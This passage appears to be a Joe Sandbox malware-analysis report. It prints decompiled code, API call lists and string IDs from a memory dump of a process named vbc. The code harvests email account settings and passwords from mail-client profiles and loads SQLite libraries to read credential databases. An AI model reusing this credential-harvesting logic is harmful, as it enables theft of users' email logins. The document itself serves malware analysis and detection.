                                                                                                                                                    0x004108be
                                                                                                                                                    0x004108d3
                                                                                                                                                    0x004108d3
                                                                                                                                                    0x004108de
                                                                                                                                                    0x004108e3
                                                                                                                                                    0x004108e7
                                                                                                                                                    0x004108fc
                                                                                                                                                    0x004108fc
                                                                                                                                                    0x00410907
                                                                                                                                                    0x0041090c
                                                                                                                                                    0x00410910
                                                                                                                                                    0x00410925
                                                                                                                                                    0x00410925
                                                                                                                                                    0x00410939
                                                                                                                                                    0x0041094d
                                                                                                                                                    0x00410952
                                                                                                                                                    0x00410959
                                                                                                                                                    0x00410962
                                                                                                                                                    0x00410964
                                                                                                                                                    0x00410979
                                                                                                                                                    0x0041098e
                                                                                                                                                    0x00410993
                                                                                                                                                    0x00410994
                                                                                                                                                    0x00410999
                                                                                                                                                    0x0041099f
                                                                                                                                                    0x004109a0
                                                                                                                                                    0x004109a9
                                                                                                                                                    0x004109b7
                                                                                                                                                    0x004109bd
                                                                                                                                                    0x004109bd
                                                                                                                                                    0x004109c3
                                                                                                                                                    0x004109c8
                                                                                                                                                    0x004109c9
                                                                                                                                                    0x004109d2
                                                                                                                                                    0x004109f6
                                                                                                                                                    0x00410a02
                                                                                                                                                    0x00410a08
                                                                                                                                                    0x004109d4
                                                                                                                                                    0x004109d4
                                                                                                                                                    0x004109d9
                                                                                                                                                    0x004109da
                                                                                                                                                    0x004109e3
                                                                                                                                                    0x00000000
                                                                                                                                                    0x004109e5
                                                                                                                                                    0x004109e5
                                                                                                                                                    0x004109ea
                                                                                                                                                    0x004109eb
                                                                                                                                                    0x004109f4
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x004109f4
                                                                                                                                                    0x004109e3
                                                                                                                                                    0x00410a0e
                                                                                                                                                    0x00410a13
                                                                                                                                                    0x00410a14
                                                                                                                                                    0x00410a1d
                                                                                                                                                    0x00410a2b
                                                                                                                                                    0x00410a31
                                                                                                                                                    0x00410a31
                                                                                                                                                    0x00410a37
                                                                                                                                                    0x00410a3c
                                                                                                                                                    0x00410a3d
                                                                                                                                                    0x00410a46
                                                                                                                                                    0x00410a6a
                                                                                                                                                    0x00410a7c
                                                                                                                                                    0x00410a48
                                                                                                                                                    0x00410a48
                                                                                                                                                    0x00410a4d
                                                                                                                                                    0x00410a4e
                                                                                                                                                    0x00410a57
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00410a59
                                                                                                                                                    0x00410a59
                                                                                                                                                    0x00410a5e
                                                                                                                                                    0x00410a5f
                                                                                                                                                    0x00410a68
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00410a68
                                                                                                                                                    0x00410a57
                                                                                                                                                    0x00410a89

                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: strcmp$_stricmp$memcpystrlen
                                                                                                                                                    • String ID: Account_Name$IMAP_Password2$IMAP_Port$IMAP_Secure_Connection$IMAP_Server$IMAP_User_Name$NNTP_Email_Address$NNTP_Password2$NNTP_Port$NNTP_Secure_Connection$NNTP_Server$NNTP_User_Name$POP3_Password2$POP3_Port$POP3_Secure_Connection$POP3_Server$POP3_User_Name$SMTP_Email_Address$SMTP_Password2$SMTP_Port$SMTP_Secure_Connection$SMTP_Server$SMTP_User_Name
                                                                                                                                                    • API String ID: 1113949926-2499304436
                                                                                                                                                    • Opcode ID: 0c75f3a23bfcbdff00a9aa801863508d09b02361048c6915a7d59a784447564f
                                                                                                                                                    • Instruction ID: 03d5d7842382467f3947e80262f6a1f2e973b0058f56c731c8fd5b97bb90a946
                                                                                                                                                    • Opcode Fuzzy Hash: 0c75f3a23bfcbdff00a9aa801863508d09b02361048c6915a7d59a784447564f
                                                                                                                                                    • Instruction Fuzzy Hash: D391517220870569E624B7329C02FD773E8AF9032DF21052FF55BE61D2EEADB981465C
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040C7CF Relevance: 61.5, APIs: 21, Strings: 14, Instructions: 232stringCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 74%
                                                                                                                                                    			E0040C7CF(intOrPtr __ecx, void* __edx, char* _a4, char* _a8) {
				signed int _v8;
				intOrPtr _v12;
				char _v16;
				void _v271;
				char _v272;
				void* __ebx;
				void* __edi;
				int _t64;
				int _t66;
				int _t68;
				int _t69;
				int _t72;
				int _t85;
				void* _t91;
				void* _t132;
				char* _t133;
				char* _t135;
				char* _t137;
				char* _t139;
				intOrPtr _t151;
				int _t153;
				int _t154;
				void* _t155;

				_t132 = __edx;
				_v12 = __ecx;
				_v272 = 0;
				memset( &_v271, 0, 0xff);
				_t133 = "mail.account.account";
				_t64 = strlen(_t133);
				_t148 = _t64;
				_t134 = _a4;
				if(strncmp(_a4, _t133, _t64) != 0) {
					_v8 = _v8 & 0x00000000;
				} else {
					_v8 = E0040C748(_t134,  &_v16, _t148);
				}
				if(_v8 != 0) {
					_push("identities");
					_push(_v8);
					L004115B2();
					if(_t91 == 0) {
						_t17 = _t155 + 0x604; // 0x604
						E004060D0(0xff, _t17, _a8);
					}
				}
				_t135 = "mail.server";
				_t66 = strlen(_t135);
				_t149 = _t66;
				_t136 = _a4;
				if(strncmp(_a4, _t135, _t66) != 0) {
					_v8 = _v8 & 0x00000000;
				} else {
					_v8 = E0040C6F3(_t149, _t136,  &_v272);
				}
				if(_v8 != 0) {
					_t85 = E0040CA7D(_v12 + 0xffffffe8, _t132,  &_v272);
					_push("username");
					_push(_v8);
					_t154 = _t85;
					L004115B2();
					if(_t85 == 0) {
						_t28 = _t154 + 0x204; // 0x204
						_t85 = E004060D0(0xff, _t28, _a8);
					}
					_push("type");
					_push(_v8);
					L004115B2();
					if(_t85 == 0) {
						_t31 = _t154 + 0x504; // 0x504
						_t85 = E004060D0(0xff, _t31, _a8);
					}
					_push("hostname");
					_push(_v8);
					L004115B2();
					if(_t85 == 0) {
						_t34 = _t154 + 0x104; // 0x104
						_t85 = E004060D0(0xff, _t34, _a8);
					}
					_push("port");
					_push(_v8);
					L004115B2();
					if(_t85 == 0) {
						_t85 = atoi(_a8);
						 *(_t154 + 0x804) = _t85;
					}
					_push("useSecAuth");
					_push(_v8);
					L004115B2();
					if(_t85 == 0) {
						_push("true");
						_push(_a8);
						L004115B2();
						if(_t85 == 0) {
							 *((intOrPtr*)(_t154 + 0x808)) = 1;
						}
					}
				}
				_t137 = "mail.identity";
				_t68 = strlen(_t137);
				_t150 = _t68;
				_t138 = _a4;
				_t69 = strncmp(_a4, _t137, _t68);
				if(_t69 != 0) {
					_v8 = _v8 & 0x00000000;
				} else {
					_t69 = E0040C6F3(_t150, _t138,  &_v272);
					_v8 = _t69;
				}
				if(_v8 != 0) {
					_t69 = E0040CA7D(_v12 + 0xffffffe8, _t132,  &_v272);
					_push("useremail");
					_push(_v8);
					_t153 = _t69;
					L004115B2();
					if(_t69 == 0) {
						_t51 = _t153 + 0x404; // 0x404
						_t69 = E004060D0(0xff, _t51, _a8);
					}
					_push("fullname");
					_push(_v8);
					L004115B2();
					if(_t69 == 0) {
						_t54 = _t153 + 4; // 0x4
						_t69 = E004060D0(0xff, _t54, _a8);
					}
				}
				_push("signon.signonfilename");
				_push(_a4);
				L004115B2();
				if(_t69 == 0) {
					_t151 = _v12;
					_t139 = _t151 + 0x245;
					_t152 = _t151 + 0x140;
					_t72 = strlen(_t151 + 0x140);
					_t60 = strlen(_a8) + 1; // 0x1
					if(_t72 + _t60 >= 0x104) {
						 *_t139 = 0;
					} else {
						E004062AD(_t139, _t152, _a8);
					}
				}
				return 1;
			}


























                                                                                                                                                    0x0040c7cf
                                                                                                                                                    0x0040c7ea
                                                                                                                                                    0x0040c7ed
                                                                                                                                                    0x0040c7f4
                                                                                                                                                    0x0040c7f9
                                                                                                                                                    0x0040c7ff
                                                                                                                                                    0x0040c804
                                                                                                                                                    0x0040c808
                                                                                                                                                    0x0040c816
                                                                                                                                                    0x0040c827
                                                                                                                                                    0x0040c818
                                                                                                                                                    0x0040c822
                                                                                                                                                    0x0040c822
                                                                                                                                                    0x0040c82f
                                                                                                                                                    0x0040c863
                                                                                                                                                    0x0040c868
                                                                                                                                                    0x0040c86b
                                                                                                                                                    0x0040c874
                                                                                                                                                    0x0040c879
                                                                                                                                                    0x0040c87f
                                                                                                                                                    0x0040c884
                                                                                                                                                    0x0040c874
                                                                                                                                                    0x0040c885
                                                                                                                                                    0x0040c88b
                                                                                                                                                    0x0040c890
                                                                                                                                                    0x0040c894
                                                                                                                                                    0x0040c8a2
                                                                                                                                                    0x0040c8b7
                                                                                                                                                    0x0040c8a4
                                                                                                                                                    0x0040c8b2
                                                                                                                                                    0x0040c8b2
                                                                                                                                                    0x0040c8bf
                                                                                                                                                    0x0040c8d2
                                                                                                                                                    0x0040c8d7
                                                                                                                                                    0x0040c8dc
                                                                                                                                                    0x0040c8df
                                                                                                                                                    0x0040c8e1
                                                                                                                                                    0x0040c8ea
                                                                                                                                                    0x0040c8ef
                                                                                                                                                    0x0040c8f5
                                                                                                                                                    0x0040c8fa
                                                                                                                                                    0x0040c8fb
                                                                                                                                                    0x0040c900
                                                                                                                                                    0x0040c903
                                                                                                                                                    0x0040c90c
                                                                                                                                                    0x0040c911
                                                                                                                                                    0x0040c917
                                                                                                                                                    0x0040c91c
                                                                                                                                                    0x0040c91d
                                                                                                                                                    0x0040c922
                                                                                                                                                    0x0040c925
                                                                                                                                                    0x0040c92e
                                                                                                                                                    0x0040c933
                                                                                                                                                    0x0040c939
                                                                                                                                                    0x0040c93e
                                                                                                                                                    0x0040c93f
                                                                                                                                                    0x0040c944
                                                                                                                                                    0x0040c947
                                                                                                                                                    0x0040c950
                                                                                                                                                    0x0040c955
                                                                                                                                                    0x0040c95b
                                                                                                                                                    0x0040c95b
                                                                                                                                                    0x0040c961
                                                                                                                                                    0x0040c966
                                                                                                                                                    0x0040c969
                                                                                                                                                    0x0040c972
                                                                                                                                                    0x0040c974
                                                                                                                                                    0x0040c979
                                                                                                                                                    0x0040c97c
                                                                                                                                                    0x0040c985
                                                                                                                                                    0x0040c987
                                                                                                                                                    0x0040c987
                                                                                                                                                    0x0040c985
                                                                                                                                                    0x0040c972
                                                                                                                                                    0x0040c991
                                                                                                                                                    0x0040c997
                                                                                                                                                    0x0040c99c
                                                                                                                                                    0x0040c9a0
                                                                                                                                                    0x0040c9a4
                                                                                                                                                    0x0040c9ae
                                                                                                                                                    0x0040c9c3
                                                                                                                                                    0x0040c9b0
                                                                                                                                                    0x0040c9b9
                                                                                                                                                    0x0040c9be
                                                                                                                                                    0x0040c9be
                                                                                                                                                    0x0040c9cb
                                                                                                                                                    0x0040c9da
                                                                                                                                                    0x0040c9df
                                                                                                                                                    0x0040c9e4
                                                                                                                                                    0x0040c9e7
                                                                                                                                                    0x0040c9e9
                                                                                                                                                    0x0040c9f2
                                                                                                                                                    0x0040c9f7
                                                                                                                                                    0x0040c9fd
                                                                                                                                                    0x0040ca02
                                                                                                                                                    0x0040ca03
                                                                                                                                                    0x0040ca08
                                                                                                                                                    0x0040ca0b
                                                                                                                                                    0x0040ca14
                                                                                                                                                    0x0040ca19
                                                                                                                                                    0x0040ca1c
                                                                                                                                                    0x0040ca21
                                                                                                                                                    0x0040ca14
                                                                                                                                                    0x0040ca22
                                                                                                                                                    0x0040ca27
                                                                                                                                                    0x0040ca2a
                                                                                                                                                    0x0040ca33
                                                                                                                                                    0x0040ca35
                                                                                                                                                    0x0040ca38
                                                                                                                                                    0x0040ca3e
                                                                                                                                                    0x0040ca45
                                                                                                                                                    0x0040ca54
                                                                                                                                                    0x0040ca5f
                                                                                                                                                    0x0040ca70
                                                                                                                                                    0x0040ca61
                                                                                                                                                    0x0040ca67
                                                                                                                                                    0x0040ca6d
                                                                                                                                                    0x0040ca5f
                                                                                                                                                    0x0040ca7a

                                                                                                                                                    APIs
                                                                                                                                                    • memset.MSVCRT ref: 0040C7F4
                                                                                                                                                    • strlen.MSVCRT ref: 0040C7FF
                                                                                                                                                    • strncmp.MSVCRT(?,mail.account.account,00000000,mail.account.account,?,00000000,000000FF), ref: 0040C80C
                                                                                                                                                    • _stricmp.MSVCRT(00000000,server), ref: 0040C849
                                                                                                                                                    • _stricmp.MSVCRT(00000000,identities), ref: 0040C86B
                                                                                                                                                    • strlen.MSVCRT ref: 0040C88B
                                                                                                                                                    • strncmp.MSVCRT(?,mail.server,00000000,mail.server), ref: 0040C898
                                                                                                                                                    • _stricmp.MSVCRT(00000000,username,00000000), ref: 0040C8E1
                                                                                                                                                    • _stricmp.MSVCRT(00000000,type,00000000), ref: 0040C903
                                                                                                                                                    • _stricmp.MSVCRT(00000000,hostname,00000000), ref: 0040C925
                                                                                                                                                    • _stricmp.MSVCRT(00000000,port,00000000), ref: 0040C947
                                                                                                                                                    • atoi.MSVCRT ref: 0040C955
                                                                                                                                                      • Part of subcall function 0040C748: memset.MSVCRT ref: 0040C77E
                                                                                                                                                      • Part of subcall function 0040C748: memcpy.MSVCRT ref: 0040C7A0
                                                                                                                                                      • Part of subcall function 0040C748: atoi.MSVCRT ref: 0040C7B4
                                                                                                                                                    • _stricmp.MSVCRT(00000000,useSecAuth,00000000), ref: 0040C969
                                                                                                                                                    • _stricmp.MSVCRT(?,true,00000000), ref: 0040C97C
                                                                                                                                                    • strlen.MSVCRT ref: 0040C997
                                                                                                                                                    • strncmp.MSVCRT(?,mail.identity,00000000,mail.identity), ref: 0040C9A4
                                                                                                                                                    • _stricmp.MSVCRT(00000000,useremail,00000000), ref: 0040C9E9
                                                                                                                                                    • _stricmp.MSVCRT(00000000,fullname,00000000), ref: 0040CA0B
                                                                                                                                                    • _stricmp.MSVCRT(?,signon.signonfilename), ref: 0040CA2A
                                                                                                                                                    • strlen.MSVCRT ref: 0040CA45
                                                                                                                                                    • strlen.MSVCRT ref: 0040CA4F
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _stricmp$strlen$strncmp$atoimemset$memcpy
                                                                                                                                                    • String ID: fullname$hostname$identities$mail.account.account$mail.identity$mail.server$port$server$signon.signonfilename$true$type$useSecAuth$useremail$username
                                                                                                                                                    • API String ID: 736090197-593045482
                                                                                                                                                    • Opcode ID: fa6975b133b13f5067aa23c0df6e7e68559b1782356a0831ed68d1fdd542dc29
                                                                                                                                                    • Instruction ID: 8e23c8f9271997a3be880b93158be8956f510041fead3e1da2e0ecaa9a645c54
                                                                                                                                                    • Opcode Fuzzy Hash: fa6975b133b13f5067aa23c0df6e7e68559b1782356a0831ed68d1fdd542dc29
                                                                                                                                                    • Instruction Fuzzy Hash: E271C972504204FADF10EB65CC42BDE77A6DF50329F20426BF506B21E1EB79AF819A5C
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040F64B Relevance: 56.1, APIs: 20, Strings: 12, Instructions: 127libraryloaderstringCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E0040F64B(intOrPtr* __esi, char* _a4) {
				void _v283;
				char _v284;
				void _v547;
				char _v548;
				struct HINSTANCE__* _t45;
				struct HINSTANCE__* _t46;
				struct HINSTANCE__* _t57;
				struct HINSTANCE__* _t68;
				CHAR* _t79;
				intOrPtr* _t81;

				_t81 = __esi;
				if( *((intOrPtr*)(__esi + 0x24)) != 0) {
					L14:
					return 1;
				}
				_v284 = 0;
				memset( &_v283, 0, 0x117);
				if(_a4 == 0) {
					E0040F435( &_v284);
				} else {
					strcpy( &_v284, _a4);
				}
				if(_v284 == 0) {
					_t79 = "sqlite3.dll";
					_t45 = GetModuleHandleA(_t79);
					 *(_t81 + 0x24) = _t45;
					if(_t45 != 0) {
						goto L12;
					}
					_t57 = LoadLibraryA(_t79);
					goto L11;
				} else {
					_v548 = 0;
					memset( &_v547, 0, 0x104);
					strcpy( &_v548,  &_v284);
					strcat( &_v284, "\\sqlite3.dll");
					if(E0040614B( &_v284) == 0) {
						strcpy( &_v284,  &_v548);
						strcat( &_v284, "\\mozsqlite3.dll");
					}
					_t68 = GetModuleHandleA( &_v284);
					 *(_t81 + 0x24) = _t68;
					if(_t68 != 0) {
						L12:
						_t46 =  *(_t81 + 0x24);
						if(_t46 == 0) {
							return 0;
						}
						 *_t81 = GetProcAddress(_t46, "sqlite3_open");
						 *((intOrPtr*)(_t81 + 4)) = GetProcAddress( *(_t81 + 0x24), "sqlite3_prepare");
						 *((intOrPtr*)(_t81 + 8)) = GetProcAddress( *(_t81 + 0x24), "sqlite3_step");
						 *((intOrPtr*)(_t81 + 0xc)) = GetProcAddress( *(_t81 + 0x24), "sqlite3_column_text");
						 *((intOrPtr*)(_t81 + 0x10)) = GetProcAddress( *(_t81 + 0x24), "sqlite3_column_int");
						 *((intOrPtr*)(_t81 + 0x14)) = GetProcAddress( *(_t81 + 0x24), "sqlite3_column_int64");
						 *((intOrPtr*)(_t81 + 0x18)) = GetProcAddress( *(_t81 + 0x24), "sqlite3_finalize");
						 *((intOrPtr*)(_t81 + 0x1c)) = GetProcAddress( *(_t81 + 0x24), "sqlite3_close");
						 *((intOrPtr*)(_t81 + 0x20)) = GetProcAddress( *(_t81 + 0x24), "sqlite3_exec");
						goto L14;
					} else {
						_t57 = LoadLibraryExA( &_v284, 0, 8);
						L11:
						 *(_t81 + 0x24) = _t57;
						goto L12;
					}
				}
			}













                                                                                                                                                    0x0040f64b
                                                                                                                                                    0x0040f65b
                                                                                                                                                    0x0040f7e1
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040f7e3
                                                                                                                                                    0x0040f66e
                                                                                                                                                    0x0040f674
                                                                                                                                                    0x0040f685
                                                                                                                                                    0x0040f694
                                                                                                                                                    0x0040f687
                                                                                                                                                    0x0040f68b
                                                                                                                                                    0x0040f691
                                                                                                                                                    0x0040f69f
                                                                                                                                                    0x0040f741
                                                                                                                                                    0x0040f747
                                                                                                                                                    0x0040f74f
                                                                                                                                                    0x0040f752
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040f755
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040f6a5
                                                                                                                                                    0x0040f6b2
                                                                                                                                                    0x0040f6b8
                                                                                                                                                    0x0040f6cb
                                                                                                                                                    0x0040f6dc
                                                                                                                                                    0x0040f6f2
                                                                                                                                                    0x0040f702
                                                                                                                                                    0x0040f713
                                                                                                                                                    0x0040f718
                                                                                                                                                    0x0040f722
                                                                                                                                                    0x0040f72a
                                                                                                                                                    0x0040f72d
                                                                                                                                                    0x0040f75e
                                                                                                                                                    0x0040f75e
                                                                                                                                                    0x0040f763
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040f7ea
                                                                                                                                                    0x0040f77f
                                                                                                                                                    0x0040f78b
                                                                                                                                                    0x0040f798
                                                                                                                                                    0x0040f7a5
                                                                                                                                                    0x0040f7b2
                                                                                                                                                    0x0040f7bf
                                                                                                                                                    0x0040f7cc
                                                                                                                                                    0x0040f7d9
                                                                                                                                                    0x0040f7de
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040f72f
                                                                                                                                                    0x0040f739
                                                                                                                                                    0x0040f75b
                                                                                                                                                    0x0040f75b
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040f75b
                                                                                                                                                    0x0040f72d

                                                                                                                                                    APIs
                                                                                                                                                    • memset.MSVCRT ref: 0040F674
                                                                                                                                                    • strcpy.MSVCRT(?,?,?,?,00000000), ref: 0040F68B
                                                                                                                                                    • memset.MSVCRT ref: 0040F6B8
                                                                                                                                                    • strcpy.MSVCRT(?,?,?,00000000,00000104,?,?,00000000), ref: 0040F6CB
                                                                                                                                                    • strcat.MSVCRT(?,\sqlite3.dll,?,?,?,00000000,00000104,?,?,00000000), ref: 0040F6DC
                                                                                                                                                    • strcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040F702
                                                                                                                                                    • strcat.MSVCRT(?,\mozsqlite3.dll,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040F713
                                                                                                                                                    • GetModuleHandleA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040F722
                                                                                                                                                    • LoadLibraryExA.KERNEL32(?,00000000,00000008,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040F739
                                                                                                                                                    • GetModuleHandleA.KERNEL32(sqlite3.dll,?,?,00000000), ref: 0040F747
                                                                                                                                                    • LoadLibraryA.KERNEL32(sqlite3.dll,?,?,00000000), ref: 0040F755
                                                                                                                                                    • GetProcAddress.KERNEL32(?,sqlite3_open), ref: 0040F775
                                                                                                                                                    • GetProcAddress.KERNEL32(?,sqlite3_prepare), ref: 0040F781
                                                                                                                                                    • GetProcAddress.KERNEL32(?,sqlite3_step), ref: 0040F78E
                                                                                                                                                    • GetProcAddress.KERNEL32(?,sqlite3_column_text), ref: 0040F79B
                                                                                                                                                    • GetProcAddress.KERNEL32(?,sqlite3_column_int), ref: 0040F7A8
                                                                                                                                                    • GetProcAddress.KERNEL32(?,sqlite3_column_int64), ref: 0040F7B5
                                                                                                                                                    • GetProcAddress.KERNEL32(?,sqlite3_finalize), ref: 0040F7C2
                                                                                                                                                    • GetProcAddress.KERNEL32(?,sqlite3_close), ref: 0040F7CF
                                                                                                                                                    • GetProcAddress.KERNEL32(?,sqlite3_exec), ref: 0040F7DC
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AddressProc$strcpy$HandleLibraryLoadModulememsetstrcat
                                                                                                                                                    • String ID: \mozsqlite3.dll$\sqlite3.dll$sqlite3.dll$sqlite3_close$sqlite3_column_int$sqlite3_column_int64$sqlite3_column_text$sqlite3_exec$sqlite3_finalize$sqlite3_open$sqlite3_prepare$sqlite3_step
                                                                                                                                                    • API String ID: 3567885941-2042458128
                                                                                                                                                    • Opcode ID: bd0ce2e375925359ec1219c205f3dbe1c8e580fb1eb91f69f3ac3bcbec633a35
                                                                                                                                                    • Instruction ID: 8fd3bcd04759d815ffa5d5b817f34976dc276f641444eb2ebd63b60ef60fef8a
                                                                                                                                                    • Opcode Fuzzy Hash: bd0ce2e375925359ec1219c205f3dbe1c8e580fb1eb91f69f3ac3bcbec633a35
                                                                                                                                                    • Instruction Fuzzy Hash: C9416571940308AACB30AF718D85DCBBBF9AB58705F10497BE246E3550E778E685CF58
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040E4A4 Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 264stringCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 98%
                                                                                                                                                    			E0040E4A4(void* __ecx, intOrPtr* __esi, void* __eflags, signed int _a4, signed int _a8, intOrPtr _a12, struct HDC__* _a16, long _a20, long _a24, intOrPtr _a28, signed int _a32, long _a36, intOrPtr _a40, struct tagPOINT _a44, intOrPtr _a48, intOrPtr _a52, intOrPtr _a56, struct tagPOINT _a60, intOrPtr _a64, intOrPtr _a68, intOrPtr _a72, intOrPtr _a76, char _a80, intOrPtr _a84, intOrPtr _a88, intOrPtr _a92, long _a96, struct tagPOINT _a100, intOrPtr _a104, intOrPtr _a108, intOrPtr _a112, struct tagSIZE _a116, struct tagRECT _a124, intOrPtr _a128, intOrPtr _a136, char _a336) {
				signed int _v0;
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				signed int _v28;
				intOrPtr _v44;
				struct HWND__* _v48;
				struct HWND__* _v52;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				struct HDC__* _t169;
				struct HWND__* _t171;
				intOrPtr _t223;
				void* _t224;
				intOrPtr _t235;
				struct HWND__* _t237;
				void* _t240;
				intOrPtr* _t274;
				signed int _t275;
				signed int _t276;

				_t274 = __esi;
				_t276 = _t275 & 0xfffffff8;
				E004118A0(0x2198, __ecx);
				_a12 =  *((intOrPtr*)( *((intOrPtr*)(__esi + 0x10)) + 0x1b4));
				_t237 = GetDlgItem( *(__esi + 4), 0x3e9);
				_a4 = GetDlgItem( *(__esi + 4), 0x3e8);
				_a20 = GetWindowLongA(_t237, 0xfffffff0);
				_a24 = GetWindowLongA(_a4, 0xfffffff0);
				_a96 = GetWindowLongA(_t237, 0xffffffec);
				_a36 = GetWindowLongA(_a4, 0xffffffec);
				GetWindowRect(_t237,  &_a100);
				GetWindowRect(_a4,  &_a60);
				MapWindowPoints(0,  *(__esi + 4),  &_a100, 2);
				MapWindowPoints(0,  *(__esi + 4),  &_a60, 2);
				_t240 = _a108 - _a100.x;
				_a4 = _a4 & 0x00000000;
				_a28 = _a68 - _a60.x;
				_a76 = _a112 - _a104;
				_a40 = _a72 - _a64;
				_t169 = GetDC( *(__esi + 4));
				_a16 = _t169;
				if(_t169 == 0) {
					L9:
					_v0 = _v0 & 0x00000000;
					if( *((intOrPtr*)( *((intOrPtr*)(_t274 + 0x10)) + 0x1b0)) <= 0) {
						L12:
						_t171 = GetDlgItem( *(_t274 + 4), 1);
						_a36 = _t171;
						GetWindowRect(_t171,  &_a44);
						MapWindowPoints(0,  *(_t274 + 4),  &_a44, 2);
						GetClientRect( *(_t274 + 4),  &_a124);
						GetWindowRect( *(_t274 + 4),  &_a80);
						SetWindowPos( *(_t274 + 4), 0, 0, 0, _a88 - _a80 + 1, _a128 - _a136 - _a48 - _a84 + _a56 + _a92 + _a4 + 0x15, 0x206);
						GetClientRect( *(_t274 + 4),  &_a80);
						return SetWindowPos(_a36, 0, _a44.x, _a48 - _a56 - _a84 + _a92 - 5, _a52 - _a44 + 1, _a56 - _a48 + 1, 0x204);
					}
					_a20 = _a20 | 0x10000000;
					_a24 = _a24 | 0x10000000;
					_a8 = _a12 + 0x10;
					do {
						 *((intOrPtr*)( *_t274 + 0x1c))(_v0);
						_v20 = E00401562(_t274, _a92, "STATIC", _a16, _a96, _v0 + _a100.x, _t240, _a72);
						_v44 = E00401562(_t274, _a4, "EDIT", _v8, _a28, _v28 + _a32, _v4,  *(_t274 + 0x14) * _a8);
						sprintf( &_a80, "%s:", _v52->i);
						_t276 = _t276 + 0xc;
						SetWindowTextA(_v48,  &_a80);
						SetWindowTextA(_v52,  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t274 + 0xc))))))(_v60,  &_a336));
						_v60 = _v60 + 0x14;
						_v64 = _v64 +  *(_t274 + 0x14) * _v28 +  *((intOrPtr*)(_t274 + 0x18));
						_v68 = _v68 + 1;
					} while (_v68 <  *((intOrPtr*)( *((intOrPtr*)(_t274 + 0x10)) + 0x1b0)));
					goto L12;
				}
				_t223 = 0;
				_a32 = _a32 & 0;
				_a8 = 0;
				if( *((intOrPtr*)( *((intOrPtr*)(__esi + 0x10)) + 0x1b0)) <= 0) {
					L8:
					_t224 = _t223 - _t240;
					_a28 = _a28 - _t224;
					_a60.x = _a60.x + _t224;
					_t240 = _t240 + _t224;
					ReleaseDC( *(_t274 + 4), _a16);
					goto L9;
				}
				_v0 = _a12 + 0x10;
				do {
					if(GetTextExtentPoint32A(_a16,  *_v0, strlen( *_v0),  &_a116) != 0) {
						_t235 = _a100.x + 0xa;
						if(_t235 > _v8) {
							_v8 = _t235;
						}
					}
					_a16 =  &(_a16->i);
					_v16 = _v16 + 0x14;
				} while (_a16 <  *((intOrPtr*)( *((intOrPtr*)(_t274 + 0x10)) + 0x1b0)));
				_t223 = _v8;
				goto L8;
			}

























                                                                                                                                                    0x0040e4a4
                                                                                                                                                    0x0040e4a7
                                                                                                                                                    0x0040e4af
                                                                                                                                                    0x0040e4cd
                                                                                                                                                    0x0040e4db
                                                                                                                                                    0x0040e4e8
                                                                                                                                                    0x0040e4f4
                                                                                                                                                    0x0040e4fd
                                                                                                                                                    0x0040e509
                                                                                                                                                    0x0040e515
                                                                                                                                                    0x0040e51f
                                                                                                                                                    0x0040e52a
                                                                                                                                                    0x0040e53e
                                                                                                                                                    0x0040e54c
                                                                                                                                                    0x0040e55d
                                                                                                                                                    0x0040e561
                                                                                                                                                    0x0040e566
                                                                                                                                                    0x0040e575
                                                                                                                                                    0x0040e581
                                                                                                                                                    0x0040e585
                                                                                                                                                    0x0040e58d
